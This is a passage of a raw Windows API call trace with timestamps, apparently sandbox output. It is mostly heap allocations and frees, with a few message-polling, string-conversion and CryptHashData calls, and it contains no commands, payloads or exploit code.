Flags=0x0, Size=0x10) returned 0x2e514c0 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0231.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0231.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0231.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0231.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0231.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0231.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0231.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0231.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0231.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55038 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ff8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0231.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0231.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0231.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0231.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0231.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0231.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0231.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0231.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0231.675] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0231.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0231.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0231.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0231.677] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.677] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0231.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e512c8 [0231.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e512c8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0231.678] CryptHashData (hHash=0xa876d0, pbData=0x2e54ff8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0231.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0231.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0231.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0231.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0231.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0231.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0231.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0231.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0231.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: 